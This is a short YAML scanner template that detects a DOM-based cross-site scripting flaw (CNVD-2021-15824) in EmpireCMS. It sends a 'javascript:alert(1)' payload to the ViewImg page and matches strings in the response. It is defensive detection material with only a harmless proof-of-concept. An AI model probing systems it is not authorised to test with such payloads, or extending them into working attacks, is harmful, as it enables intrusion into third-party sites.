id: CNVD-2021-15824

info:
  name: EmpireCMS DOM Cross Site-Scripting
  author: daffainfo
  severity: high
  description: EmpireCMS is vulnerable to a DOM based cross-site scripting attack.
  reference:
    - https://sourceforge.net/projects/empirecms/
    - https://www.bilibili.com/read/cv10441910
    - https://vul.wangan.com/a/CNVD-2021-15824

rules:
  r0:
    request:
      method: GET
      path: "/e/ViewImg/index.html?url=javascript:alert(1)"
    expression: |
      response.status == 200 && response.body.bcontains(b'"+Request("url")+"') && response.body.bcontains(b'if(Request("url")!=0)')
expression: r0()